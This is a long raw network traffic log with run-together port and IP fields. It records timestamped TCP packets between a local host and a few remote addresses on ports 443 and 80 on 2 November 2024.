                                                                                                                                                                                                                                              Nov 2, 2024 07:16:13.047691107 CET4436381713.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:13.047758102 CET4436381713.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:13.047816038 CET63817443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:13.047935963 CET63817443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:13.047935963 CET63817443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:13.047971964 CET4436381713.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:13.047998905 CET4436381713.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:13.050122023 CET63823443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:13.050154924 CET4436382313.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:13.050223112 CET63823443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:13.050751925 CET63823443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:13.050777912 CET4436382313.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:13.446178913 CET4436381813.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:13.480309963 CET63818443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:13.480344057 CET4436381813.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:13.480654955 CET63818443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:13.480662107 CET4436381813.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:13.608175039 CET4436381813.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:13.608252048 CET4436381813.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:13.608309984 CET63818443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:13.608505964 CET63818443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:13.608524084 CET4436381813.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:13.608537912 CET63818443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:13.608545065 CET4436381813.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:13.611309052 CET63824443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:13.611414909 CET4436382413.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:13.611494064 CET63824443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:13.611747980 CET63824443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:13.611783028 CET4436382413.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:13.670274973 CET4436382113.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:13.676134109 CET63821443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:13.676201105 CET4436382113.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:13.679145098 CET63821443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:13.679162025 CET4436382113.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:13.692840099 CET4436382013.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:13.694221020 CET63820443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:13.694289923 CET4436382013.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:13.710973978 CET63820443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:13.711013079 CET4436382013.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:13.786252022 CET4436382213.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:13.787071943 CET63822443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:13.787138939 CET4436382213.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:13.787477970 CET63822443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:13.787493944 CET4436382213.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:13.789027929 CET4436382313.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:13.789341927 CET63823443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:13.789364100 CET4436382313.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:13.789717913 CET63823443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:13.789730072 CET4436382313.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:13.807017088 CET4436382113.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:13.807085991 CET4436382113.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:13.807142973 CET63821443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:13.807262897 CET63821443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:13.807262897 CET63821443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:13.807291985 CET4436382113.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:13.807327986 CET4436382113.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:13.821211100 CET63825443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:13.821240902 CET4436382513.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:13.821398020 CET63825443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:13.821535110 CET63825443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:13.821542978 CET4436382513.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:13.854123116 CET4436382013.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:13.854146004 CET4436382013.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:13.854197979 CET4436382013.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:13.854223013 CET63820443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:13.854377031 CET63820443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:13.854533911 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:13.854578018 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:13.854588985 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:13.854592085 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:13.854608059 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:13.854619980 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:13.854619980 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:13.854643106 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:13.854654074 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:13.854718924 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:13.854778051 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:13.854804993 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:13.854841948 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:13.854844093 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:13.854854107 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:13.854861021 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:13.854873896 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:13.854892015 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:13.859132051 CET63820443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:13.859181881 CET4436382013.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:13.859215975 CET63820443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:13.859230995 CET4436382013.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:13.859590054 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:13.859647036 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:13.859683037 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:13.859694958 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:13.859725952 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:13.864994049 CET63826443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:13.865016937 CET4436382613.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:13.865067959 CET63826443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:13.865600109 CET63826443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:13.865612030 CET4436382613.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:13.915292978 CET4436382213.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:13.915453911 CET4436382213.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:13.915523052 CET63822443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:13.917428017 CET63822443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:13.917428017 CET63822443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:13.917453051 CET4436382213.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:13.917475939 CET4436382213.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:13.919476986 CET4436382313.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:13.919538975 CET4436382313.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:13.919599056 CET63823443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:13.919920921 CET63823443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:13.919943094 CET4436382313.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:13.919967890 CET63823443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:13.919980049 CET4436382313.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:13.925455093 CET63827443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:13.925487041 CET4436382713.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:13.925563097 CET63827443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:13.926382065 CET63828443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:13.926418066 CET4436382813.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:13.926481962 CET63828443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:13.927881002 CET63827443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:13.927897930 CET4436382713.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:13.928301096 CET63828443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:13.928328037 CET4436382813.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.022105932 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.022119045 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.022130013 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.022149086 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.022159100 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.022171021 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.022283077 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.022775888 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.022789955 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.022800922 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.022814035 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.022826910 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.022850037 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.023319006 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.023329973 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.023340940 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.023353100 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.023363113 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.023375988 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.023401022 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.023852110 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.023900032 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.023900986 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.023912907 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.023925066 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.023936987 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.023941040 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.023941040 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.023967028 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.023976088 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.024741888 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.024753094 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.024765015 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.024776936 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.024846077 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.027163029 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.027204990 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.027370930 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.027404070 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.115434885 CET8063794208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.115497112 CET6379480192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.189687014 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.189706087 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.189714909 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.189733982 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.189759970 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.189765930 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.189773083 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.189785004 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.189795017 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.189822912 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.190011978 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.190021992 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.190033913 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.190052986 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.190063000 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.190076113 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.190084934 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.190088987 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.190110922 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.190131903 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.190469980 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.190488100 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.190500975 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.190509081 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.190511942 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.190524101 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.190527916 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.190548897 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.190583944 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.190953016 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.190963984 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.190973997 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.190996885 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.190998077 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.191009045 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.191030979 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.191035032 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.191042900 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.191045046 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.191056013 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.191066980 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.191076994 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.191090107 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.191108942 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.191132069 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.191802979 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.191814899 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.191831112 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.191842079 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.191854000 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.191862106 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.191880941 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.191915035 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.192305088 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.192316055 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.192326069 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.192337036 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.192349911 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.192357063 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.192368031 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.192378044 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.192380905 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.192394972 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.192398071 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.192408085 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.192414045 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.192420006 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.192447901 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.192473888 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.193150997 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.193164110 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.193173885 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.193192959 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.193228960 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.193232059 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.193248034 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.193259954 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.193264961 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.193279028 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.193301916 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.347013950 CET4436382413.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.347407103 CET63824443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.347448111 CET4436382413.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.347881079 CET63824443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.347897053 CET4436382413.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.357357025 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.357419968 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.357434034 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.357435942 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.357480049 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.357553005 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.357570887 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.357584000 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.357595921 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.357620001 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.357707024 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.357718945 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.357729912 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.357741117 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.357753038 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.357777119 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.357831001 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.357876062 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.357923985 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.357969999 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.358047962 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.358066082 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.358077049 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.358087063 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:14.358093977 CET6381980192.168.2.4185.215.113.16
